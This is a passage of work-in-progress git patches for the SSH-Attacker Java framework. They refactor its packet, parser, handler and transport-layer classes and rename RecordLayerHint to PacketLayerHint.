de.rub.nds.sshattacker.core.exceptions.ConfigurationException; import de.rub.nds.sshattacker.core.packet.cipher.keys.KeySet; +import de.rub.nds.sshattacker.core.packet.compressor.PacketCompressor; +import de.rub.nds.sshattacker.core.packet.crypto.AbstractPacketEncryptor; import de.rub.nds.sshattacker.core.packet.layer.AbstractPacketLayer; import de.rub.nds.sshattacker.core.packet.layer.PacketLayerFactory; +import de.rub.nds.sshattacker.core.protocol.common.layer.MessageLayer; import de.rub.nds.sshattacker.core.protocol.connection.Channel; import de.rub.nds.sshattacker.core.protocol.connection.ChannelManager; import de.rub.nds.sshattacker.core.state.Context; @@ -46,6 +49,18 @@ public void setRandom(Random random) { private Random random; + + public AbstractPacketEncryptor getEncryptor() { + return encryptor; + } + + public PacketCompressor getCompressor() { + return compressor; + } + + private AbstractPacketEncryptor encryptor; + private PacketCompressor compressor; + /** Connection used to communicate with the remote peer */ private TransportHandler transportHandler; /** If set to true, an exception was received from the transport handler */ @@ -221,6 +236,17 @@ public void setRandom(Random random) { private KeySet keySet; // endregion + + public MessageLayer getMessageLayer() { + return messageLayer; + } + + public void setMessageLayer(MessageLayer messageLayer) { + this.messageLayer = messageLayer; + } + + private MessageLayer messageLayer = new MessageLayer(this.getContext()); + // region Connection Protocol private ChannelManager channelManager; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java index 0f6867dad..b66f94c0f 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java @@ -31,14 +31,21 @@ import de.rub.nds.sshattacker.core.layer.hints.RecordLayerHint; import de.rub.nds.sshattacker.core.layer.stream.HintedInputStream; import de.rub.nds.sshattacker.core.layer.stream.HintedLayerInputStream; +import de.rub.nds.sshattacker.core.packet.AbstractPacket; +import de.rub.nds.sshattacker.core.packet.BlobPacket; +import de.rub.nds.sshattacker.core.packet.layer.AbstractPacketLayer; +import de.rub.nds.sshattacker.core.protocol.common.SshMessage; +import de.rub.nds.sshattacker.core.protocol.common.layer.MessageLayer; import de.rub.nds.sshattacker.core.session.Session; import de.rub.nds.sshattacker.core.session.preparator.SessionPreparator; import de.rub.nds.sshattacker.core.session.serializer.SessionSerializer; import java.io.IOException; + +import de.rub.nds.sshattacker.core.workflow.action.executor.MessageActionResult; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; -public class TransportLayer extends ProtocolLayer { +public class TransportLayer extends ProtocolLayer { private static final Logger LOGGER = LogManager.getLogger(); private SshContext context; @@ -71,36 +78,67 @@ public LayerProcessingResult sendConfiguration() throws IOException { } return getLayerResult();*/ - LayerConfiguration configuration = getLayerConfiguration(); + LayerConfiguration configuration = getLayerConfiguration(); if (configuration != null && configuration.getContainerList() != null) { - for (Session session : configuration.getContainerList()) { - if (containerAlreadyUsedByHigherLayer(session) /*|| skipEmptyRecords(session)*/) { + for (SshMessage message: configuration.getContainerList()) { + if (containerAlreadyUsedByHigherLayer(message) /*|| skipEmptyRecords(session)*/) { continue; } - ProtocolMessageType contentType = session.getContentMessageType(); + + MessageLayer messageLayer = context.getMessageLayer(); + + try { + AbstractPacket packet = messageLayer.serialize(message); + AbstractPacketLayer packetLayer = context.getPacketLayer(); + byte[] serializedMessage = packetLayer.preparePacket(packet); + + LayerProcessingResult layerProcessingResult = getLowerLayer().sendData(null, serializedMessage); + + /*sendPacket(context, packet); + Handler handler = message.getHandler(context); + if (handler instanceof MessageSentHandler) { + ((MessageSentHandler) handler).adjustContextAfterMessageSent(); + } + return new MessageActionResult( + Collections.singletonList(packet), Collections.singletonList(message));*/ + } catch (IOException e) { + LOGGER.warn("Error while sending packet: " + e.getMessage()); + //return new MessageActionResult(); + } + } + + /*public MessageActionResult sendMessages( + SshContext context, Stream> messageStream) { + return messageStream + .map(message -> sendMessage(context, message)) + .reduce(MessageActionResult::merge) + .orElse(new MessageActionResult()); + }*/ + +/* ProtocolMessageType contentType = packet.getContentMessageType(); if (contentType == null) { contentType = ProtocolMessageType.UNKNOWN; LOGGER.warn( "Sending record without a LayerProcessing hint. Using \"UNKNOWN\" as the type"); } - /*if (encryptor.getRecordCipher(writeEpoch).getState().getVersion().isDTLS() + *//*if (encryptor.getRecordCipher(writeEpoch).getState().getVersion().isDTLS() && session.getEpoch() == null) { session.setEpoch(writeEpoch); - }*/ - if (session.getCleanProtocolMessageBytes() == null) { - session.setCleanProtocolMessageBytes(new byte[0]); + }*//* + if (packet.getCleanProtocolMessageBytes() == null) { + packet.setCleanProtocolMessageBytes(new byte[0]); } SessionPreparator preparator = - session.getSessionPreparator( - context, /* encryptor, compressor, */ contentType); + packet.getSessionPreparator( + context, *//* encryptor, compressor, *//* contentType); preparator.prepare(); preparator.afterPrepare(); - SessionSerializer serializer = session.getSessionSerializer(); + SessionSerializer serializer = packet.getSessionSerializer(); byte[] serializedMessage = serializer.serialize(); - session.setCompleteRecordBytes(serializedMessage); + packet.setCompleteRecordBytes(serializedMessage); getLowerLayer().sendData(null, serializedMessage); - addProducedContainer(session); - } + addProducedContainer(packet); + }*/ } return getLayerResult(); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/AbstractPacket.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/AbstractPacket.java index 558cc8282..12310b909 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/AbstractPacket.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/AbstractPacket.java @@ -10,6 +10,9 @@ import de.rub.nds.modifiablevariable.ModifiableVariableFactory; import de.rub.nds.modifiablevariable.ModifiableVariableProperty; import de.rub.nds.modifiablevariable.bytearray.ModifiableByteArray; +import de.rub.nds.sshattacker.core.layer.Message; +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.layer.data.DataContainer; import de.rub.nds.sshattacker.core.packet.cipher.PacketCipher; import de.rub.nds.sshattacker.core.packet.compressor.PacketCompressor; import de.rub.nds.sshattacker.core.packet.crypto.AbstractPacketEncryptor; @@ -19,7 +22,7 @@ import de.rub.nds.sshattacker.core.protocol.common.ModifiableVariableHolder; import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; -public abstract class AbstractPacket extends ModifiableVariableHolder { +public abstract class AbstractPacket> extends ModifiableVariableHolder implements DataContainer { /** * This field contains the packet bytes sent over the network. This includes packet_length, @@ -96,13 +99,13 @@ public void setPayload(byte[] payload) { this.payload = ModifiableVariableFactory.safelySetValue(this.payload, payload); } - public abstract AbstractPacketPreparator getPacketPreparator( +/* public abstract AbstractPacketPreparator getPacketPreparator( Chooser chooser, AbstractPacketEncryptor encryptor, PacketCompressor compressor); public abstract AbstractPacketParser getPacketParser( byte[] array, int startPosition, PacketCipher activeDecryptCipher, int sequenceNumber); - public abstract AbstractPacketSerializer getPacketSerializer(); + public abstract AbstractPacketSerializer getPacketSerializer();*/ public abstract void prepareComputations(); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/BinaryPacket.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/BinaryPacket.java index 41e4c9396..b7bf5c149 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/BinaryPacket.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/BinaryPacket.java @@ -12,18 +12,24 @@ import de.rub.nds.modifiablevariable.bytearray.ModifiableByteArray; import de.rub.nds.modifiablevariable.integer.ModifiableInteger; import de.rub.nds.modifiablevariable.singlebyte.ModifiableByte; +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.layer.data.*; import de.rub.nds.sshattacker.core.packet.cipher.PacketCipher; import de.rub.nds.sshattacker.core.packet.compressor.PacketCompressor; import de.rub.nds.sshattacker.core.packet.crypto.AbstractPacketEncryptor; +import de.rub.nds.sshattacker.core.packet.handler.BinaryPacketHandler; import de.rub.nds.sshattacker.core.packet.parser.BinaryPacketParser; import de.rub.nds.sshattacker.core.packet.preparator.BinaryPacketPreparator; import de.rub.nds.sshattacker.core.packet.serializer.BinaryPacketSerializer; import de.rub.nds.sshattacker.core.protocol.common.ModifiableVariableHolder; +import de.rub.nds.sshattacker.core.protocol.transport.serializer.DebugMessageSerializer; import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; + +import java.io.InputStream; import java.util.List; import java.util.Objects; -public class BinaryPacket extends AbstractPacket { +public class BinaryPacket extends AbstractPacket implements DataContainer { /** * The length of the packet in bytes, not including 'mac' or the 'packet_length' field itself. @@ -116,23 +122,23 @@ public void setSequenceNumber(int sequenceNumber) { this.sequenceNumber = ModifiableVariableFactory.safelySetValue(this.sequenceNumber, sequenceNumber); } - +/* @Override public BinaryPacketPreparator getPacketPreparator( Chooser chooser, AbstractPacketEncryptor encryptor, PacketCompressor compressor) { return new BinaryPacketPreparator(chooser, this, encryptor, compressor); } - @Override +*//* @Override public BinaryPacketParser getPacketParser( byte[] array, int startPosition, PacketCipher activeDecryptCipher, int sequenceNumber) { return new BinaryPacketParser(array, startPosition, activeDecryptCipher, sequenceNumber); - } + }*//* @Override public BinaryPacketSerializer getPacketSerializer() { return new BinaryPacketSerializer(this); - } + }*/ public PacketCryptoComputations getComputations() { return computations; @@ -177,4 +183,24 @@ public List getAllModifiableVariableHolders() { } return holders; } + + @Override + public BinaryPacketParser getParser(SshContext context, InputStream stream) { + return new BinaryPacketParser(stream); + } + + @Override + public BinaryPacketPreparator getPreparator(SshContext context) { + return new BinaryPacketPreparator(context.getChooser(), this, context.getEncryptor(), context.getCompressor()); + } + + @Override + public BinaryPacketSerializer getSerializer(SshContext context) { + return new BinaryPacketSerializer(this); + } + + @Override + public BinaryPacketHandler getHandler(SshContext context) { + return new BinaryPacketHandler(context); + } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/BlobPacket.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/BlobPacket.java index ef9f5fba9..354152a3f 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/BlobPacket.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/BlobPacket.java @@ -7,15 +7,25 @@ */ package de.rub.nds.sshattacker.core.packet; +import de.rub.nds.sshattacker.core.layer.context.LayerContext; +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.layer.data.Handler; +import de.rub.nds.sshattacker.core.layer.data.Parser; +import de.rub.nds.sshattacker.core.layer.data.Preparator; +import de.rub.nds.sshattacker.core.layer.data.Serializer; import de.rub.nds.sshattacker.core.packet.cipher.PacketCipher; import de.rub.nds.sshattacker.core.packet.compressor.PacketCompressor; import de.rub.nds.sshattacker.core.packet.crypto.AbstractPacketEncryptor; +import de.rub.nds.sshattacker.core.packet.handler.BlobPacketHandler; import de.rub.nds.sshattacker.core.packet.parser.BlobPacketParser; import de.rub.nds.sshattacker.core.packet.preparator.BlobPacketPreparator; import de.rub.nds.sshattacker.core.packet.serializer.BlobPacketSerializer; import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; -public class BlobPacket extends AbstractPacket { +import java.io.InputStream; + +public class BlobPacket extends AbstractPacket { +/* @Override public BlobPacketPreparator getPacketPreparator( Chooser chooser, AbstractPacketEncryptor encryptor, PacketCompressor compressor) { @@ -27,12 +37,35 @@ public BlobPacketParser getPacketParser( byte[] array, int startPosition, PacketCipher activeDecryptCipher, int sequenceNumber) { return new BlobPacketParser(array, startPosition); } +*/ +/* @Override public BlobPacketSerializer getPacketSerializer() { return new BlobPacketSerializer(this); } +*/ @Override public void prepareComputations() {} + + @Override + public BlobPacketParser getParser(SshContext context, InputStream stream) { + return new BlobPacketParser(stream); + } + + @Override + public BlobPacketPreparator getPreparator(SshContext context) { + return new BlobPacketPreparator(context.getChooser(), this, context.getEncryptor(), context.getCompressor()); + } + + @Override + public BlobPacketSerializer getSerializer(SshContext context) { + return new BlobPacketSerializer(this); + } + + @Override + public BlobPacketHandler getHandler(SshContext context) { + return new BlobPacketHandler(context); + } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/handler/AbstractPacketHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/handler/AbstractPacketHandler.java new file mode 100644 index 000000000..144d774ed --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/handler/AbstractPacketHandler.java @@ -0,0 +1,14 @@ +package de.rub.nds.sshattacker.core.packet.handler; + +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.layer.data.Handler; +import de.rub.nds.sshattacker.core.packet.AbstractPacket; + +public abstract class AbstractPacketHandler implements Handler { + + protected SshContext sshContext = null; + + public AbstractPacketHandler(SshContext sshContext) { + this.sshContext = sshContext; + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/handler/BinaryPacketHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/handler/BinaryPacketHandler.java new file mode 100644 index 000000000..0c53ee944 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/handler/BinaryPacketHandler.java @@ -0,0 +1,17 @@ +package de.rub.nds.sshattacker.core.packet.handler; + +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.packet.BinaryPacket; + +public class BinaryPacketHandler extends AbstractPacketHandler{ + + + public BinaryPacketHandler(SshContext context) { + super(context); + } + + @Override + public void adjustContext(BinaryPacket object) { + + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/handler/BlobPacketHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/handler/BlobPacketHandler.java new file mode 100644 index 000000000..6cbd119aa --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/handler/BlobPacketHandler.java @@ -0,0 +1,18 @@ +package de.rub.nds.sshattacker.core.packet.handler; + +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.packet.BinaryPacket; +import de.rub.nds.sshattacker.core.packet.BlobPacket; + +public class BlobPacketHandler extends AbstractPacketHandler{ + + + public BlobPacketHandler(SshContext context) { + super(context); + } + + @Override + public void adjustContext(BlobPacket object) { + + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/layer/AbstractPacketLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/layer/AbstractPacketLayer.java index 2aebc2ec1..7a1ed068e 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/layer/AbstractPacketLayer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/layer/AbstractPacketLayer.java @@ -12,6 +12,8 @@ import de.rub.nds.sshattacker.core.exceptions.CryptoException; import de.rub.nds.sshattacker.core.exceptions.ParserException; import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.layer.data.Preparator; +import de.rub.nds.sshattacker.core.layer.data.Serializer; import de.rub.nds.sshattacker.core.packet.AbstractPacket; import de.rub.nds.sshattacker.core.packet.cipher.PacketCipher; import de.rub.nds.sshattacker.core.packet.cipher.PacketCipherFactory; @@ -89,11 +91,9 @@ protected void decompressPacket(AbstractPacket packet) { } public byte[] preparePacket(AbstractPacket packet) { - AbstractPacketPreparator preparator = - packet.getPacketPreparator(context.getChooser(), getEncryptor(), getCompressor()); + Preparator preparator = packet.getPreparator(context); preparator.prepare(); - AbstractPacketSerializer serializer = - packet.getPacketSerializer(); + Serializer serializer = packet.getSerializer(context); return serializer.serialize(); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/parser/AbstractPacketParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/parser/AbstractPacketParser.java index df11fa361..8fe1c3af7 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/parser/AbstractPacketParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/parser/AbstractPacketParser.java @@ -8,11 +8,13 @@ package de.rub.nds.sshattacker.core.packet.parser; import de.rub.nds.sshattacker.core.packet.AbstractPacket; -import de.rub.nds.sshattacker.core.protocol.common.Parser; +import de.rub.nds.sshattacker.core.layer.data.Parser; + +import java.io.InputStream; public abstract class AbstractPacketParser extends Parser { - public AbstractPacketParser(byte[] array, int startPosition) { - super(array, startPosition); + public AbstractPacketParser(InputStream stream) { + super(stream); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/parser/BinaryPacketParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/parser/BinaryPacketParser.java index 417b3de21..17a605a89 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/parser/BinaryPacketParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/parser/BinaryPacketParser.java @@ -15,6 +15,8 @@ import de.rub.nds.sshattacker.core.packet.cipher.PacketChaCha20Poly1305Cipher; import de.rub.nds.sshattacker.core.packet.cipher.PacketCipher; import de.rub.nds.sshattacker.core.packet.cipher.PacketMacedCipher; + +import java.io.InputStream; import java.util.Arrays; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -30,14 +32,22 @@ public class BinaryPacketParser extends AbstractPacketParser { */ private final int sequenceNumber; +/* public BinaryPacketParser( byte[] array, int startPosition, PacketCipher activeDecryptCipher, int sequenceNumber) { super(array, startPosition); this.activeDecryptCipher = activeDecryptCipher; this.sequenceNumber = sequenceNumber; } +*/ - @Override + public BinaryPacketParser(InputStream stream) { + super(stream); + } + + + + //@Override public BinaryPacket parse() { LOGGER.debug("Parsing BinaryPacket from serialized bytes:"); try { @@ -188,4 +198,9 @@ private void parseEAMPacket(BinaryPacket binaryPacket) throws CryptoException { binaryPacket.setMac( parseByteArrayField(activeDecryptCipher.getMacAlgorithm().getOutputSize())); } + + @Override + public void parse(BinaryPacket binaryPacket) { + + } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/parser/BlobPacketParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/parser/BlobPacketParser.java index d01bbccd6..66ac5baad 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/parser/BlobPacketParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/parser/BlobPacketParser.java @@ -12,15 +12,26 @@ import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; +import java.io.InputStream; + public class BlobPacketParser extends AbstractPacketParser { private static final Logger LOGGER = LogManager.getLogger(); - public BlobPacketParser(byte[] array, int startPosition) { + /*public BlobPacketParser(byte[] array, int startPosition) { super(array, startPosition); + }*/ + + public BlobPacketParser(InputStream stream) { + super(stream); } @Override + public void parse(BlobPacket blobPacket) { + + } + + //@Override public BlobPacket parse() { LOGGER.debug("Parsing BlobPacket from serialized bytes:"); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/preparator/AbstractPacketPreparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/preparator/AbstractPacketPreparator.java index 52a422b01..53fab599b 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/preparator/AbstractPacketPreparator.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/preparator/AbstractPacketPreparator.java @@ -8,12 +8,12 @@ package de.rub.nds.sshattacker.core.packet.preparator; import de.rub.nds.sshattacker.core.packet.AbstractPacket; -import de.rub.nds.sshattacker.core.protocol.common.Preparator; +import de.rub.nds.sshattacker.core.layer.data.Preparator; import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; -public abstract class AbstractPacketPreparator extends Preparator { +public abstract class AbstractPacketPreparator> extends Preparator { private static final Logger LOGGER = LogManager.getLogger(); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/preparator/BinaryPacketPreparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/preparator/BinaryPacketPreparator.java index 1cfd63bc5..755db1141 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/preparator/BinaryPacketPreparator.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/preparator/BinaryPacketPreparator.java @@ -7,9 +7,11 @@ */ package de.rub.nds.sshattacker.core.packet.preparator; +import de.rub.nds.sshattacker.core.constants.MessageIdConstant; import de.rub.nds.sshattacker.core.packet.BinaryPacket; import de.rub.nds.sshattacker.core.packet.compressor.PacketCompressor; import de.rub.nds.sshattacker.core.packet.crypto.AbstractPacketEncryptor; +import de.rub.nds.sshattacker.core.protocol.transport.message.DebugMessage; import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/preparator/BlobPacketPreparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/preparator/BlobPacketPreparator.java index 666c72d9a..6cf14aea9 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/preparator/BlobPacketPreparator.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/preparator/BlobPacketPreparator.java @@ -7,6 +7,7 @@ */ package de.rub.nds.sshattacker.core.packet.preparator; +import de.rub.nds.sshattacker.core.packet.BinaryPacket; import de.rub.nds.sshattacker.core.packet.BlobPacket; import de.rub.nds.sshattacker.core.packet.compressor.PacketCompressor; import de.rub.nds.sshattacker.core.packet.crypto.AbstractPacketEncryptor; @@ -31,6 +32,7 @@ public BlobPacketPreparator( this.compressor = compressor; } + @Override public void prepare() { LOGGER.debug( diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/serializer/AbstractPacketSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/serializer/AbstractPacketSerializer.java index 790430b29..af612394c 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/serializer/AbstractPacketSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/serializer/AbstractPacketSerializer.java @@ -8,6 +8,6 @@ package de.rub.nds.sshattacker.core.packet.serializer; import de.rub.nds.sshattacker.core.packet.AbstractPacket; -import de.rub.nds.sshattacker.core.protocol.common.Serializer; +import de.rub.nds.sshattacker.core.layer.data.Serializer; public abstract class AbstractPacketSerializer extends Serializer {} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/layer/MessageLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/layer/MessageLayer.java index 7b49348ee..3c308c35b 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/layer/MessageLayer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/layer/MessageLayer.java @@ -7,6 +7,11 @@ */ package de.rub.nds.sshattacker.core.protocol.common.layer; +import de.rub.nds.sshattacker.core.constants.PacketLayerType; +import de.rub.nds.sshattacker.core.packet.AbstractPacket; +import de.rub.nds.sshattacker.core.packet.BinaryPacket; +import de.rub.nds.sshattacker.core.packet.BlobPacket; +import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessage; import de.rub.nds.sshattacker.core.state.Context; public class MessageLayer { @@ -23,7 +28,7 @@ public MessageLayer(Context context) { /*public Stream> parse(Stream packetStream) { return packetStream.map(this::parse); - } + }*/ public AbstractPacket serialize(ProtocolMessage message) { AbstractPacket packet; @@ -32,11 +37,11 @@ public AbstractPacket serialize(ProtocolMessage message) { } else { packet = new BinaryPacket(); } - packet.setPayload(message.getHandler(context).getSerializer().serialize()); + packet.setPayload(message.getSerializer(context.getSshContext()).serialize()); return packet; } - public Stream serialize(Stream> messageStream) { + /*public Stream serialize(Stream> messageStream) { return messageStream.map(this::serialize); }*/ } From 2adbdfb5fd28ff0683c7520a0dbb703048e00b3e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Steffen=20Bro=C3=9Fler?= Date: Fri, 9 Jun 2023 01:11:01 +0200 Subject: [PATCH 009/176] wip: migrating send and receive actions --- .../core/layer/context/SshContext.java | 17 +- ...ordLayerHint.java => PacketLayerHint.java} | 12 +- .../core/layer/impl/SSH1Layer.java | 6 +- .../core/layer/impl/SSH2Layer.java | 28 +- .../core/layer/impl/TransportLayer.java | 239 +++++++++--------- .../core/packet/AbstractPacket.java | 13 +- .../sshattacker/core/packet/BinaryPacket.java | 33 ++- .../sshattacker/core/packet/BlobPacket.java | 53 ++-- .../packet/handler/AbstractPacketHandler.java | 12 +- .../packet/handler/BinaryPacketHandler.java | 14 +- .../packet/handler/BlobPacketHandler.java | 15 +- .../packet/layer/AbstractPacketLayer.java | 15 +- .../core/packet/layer/BinaryPacketLayer.java | 8 +- .../core/packet/layer/BlobPacketLayer.java | 7 +- .../packet/parser/AbstractPacketParser.java | 3 +- .../packet/parser/BinaryPacketParser.java | 43 ++-- .../core/packet/parser/BlobPacketParser.java | 10 +- .../preparator/AbstractPacketPreparator.java | 2 +- .../preparator/BinaryPacketPreparator.java | 2 - .../preparator/BlobPacketPreparator.java | 2 - .../serializer/AbstractPacketSerializer.java | 2 +- .../serializer/BinaryPacketSerializer.java | 3 +- .../serializer/BlobPacketSerializer.java | 3 +- .../action/ForwardMessagesAction.java | 6 +- .../action/ProxyFilterMessagesAction.java | 2 +- .../action/executor/ReceiveMessageHelper.java | 52 ++-- .../test/java/executing/NetcatWorkflow.java | 2 +- .../java/executing/NetcatWorkflowFactory.java | 4 +- 28 files changed, 306 insertions(+), 302 deletions(-) rename SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/hints/{RecordLayerHint.java => PacketLayerHint.java} (86%) diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java index 31e0ae054..a3e6884b0 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java @@ -16,6 +16,7 @@ import de.rub.nds.sshattacker.core.crypto.kex.RsaKeyExchange; import de.rub.nds.sshattacker.core.crypto.keys.SshPublicKey; import de.rub.nds.sshattacker.core.exceptions.ConfigurationException; +import de.rub.nds.sshattacker.core.packet.cipher.PacketCipher; import de.rub.nds.sshattacker.core.packet.cipher.keys.KeySet; import de.rub.nds.sshattacker.core.packet.compressor.PacketCompressor; import de.rub.nds.sshattacker.core.packet.crypto.AbstractPacketEncryptor; @@ -49,7 +50,6 @@ public void setRandom(Random random) { private Random random; - public AbstractPacketEncryptor getEncryptor() { return encryptor; } @@ -58,8 +58,18 @@ public PacketCompressor getCompressor() { return compressor; } - private AbstractPacketEncryptor encryptor; - private PacketCompressor compressor; + private AbstractPacketEncryptor encryptor; + private PacketCompressor compressor; + + public PacketCipher getActiveDecryptCipher() { + return activeDecryptCipher; + } + + public void setActiveDecryptCipher(PacketCipher activeDecryptCipher) { + this.activeDecryptCipher = activeDecryptCipher; + } + + private PacketCipher activeDecryptCipher; /** Connection used to communicate with the remote peer */ private TransportHandler transportHandler; @@ -236,7 +246,6 @@ public PacketCompressor getCompressor() { private KeySet keySet; // endregion - public MessageLayer getMessageLayer() { return messageLayer; } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/hints/RecordLayerHint.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/hints/PacketLayerHint.java similarity index 86% rename from SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/hints/RecordLayerHint.java rename to SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/hints/PacketLayerHint.java index debfa3e31..842cfc454 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/hints/RecordLayerHint.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/hints/PacketLayerHint.java @@ -14,7 +14,7 @@ * The Record Layer/Fragment layer need information about the messages they're sending. This class * holds information about the messages such as their message type. */ -public class RecordLayerHint implements LayerProcessingHint { +public class PacketLayerHint implements LayerProcessingHint { private final ProtocolMessageType type; @@ -24,21 +24,21 @@ public class RecordLayerHint implements LayerProcessingHint { private final Integer messageSequence; - public RecordLayerHint(ProtocolMessageType type) { + public PacketLayerHint(ProtocolMessageType type) { this.type = type; this.epoch = null; this.sequenceNumber = null; this.messageSequence = null; } - public RecordLayerHint(ProtocolMessageType type, int epoch, int sequenceNumber) { + public PacketLayerHint(ProtocolMessageType type, int epoch, int sequenceNumber) { this.type = type; this.epoch = epoch; this.sequenceNumber = sequenceNumber; this.messageSequence = null; } - public RecordLayerHint(ProtocolMessageType type, int messageSequence) { + public PacketLayerHint(ProtocolMessageType type, int messageSequence) { this.type = type; this.epoch = null; this.sequenceNumber = null; @@ -47,8 +47,8 @@ public RecordLayerHint(ProtocolMessageType type, int messageSequence) { @Override public boolean equals(Object other) { - if (other instanceof RecordLayerHint) { - RecordLayerHint otherHint = (RecordLayerHint) other; + if (other instanceof PacketLayerHint) { + PacketLayerHint otherHint = (PacketLayerHint) other; if (this.type == otherHint.type) { return true; } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java 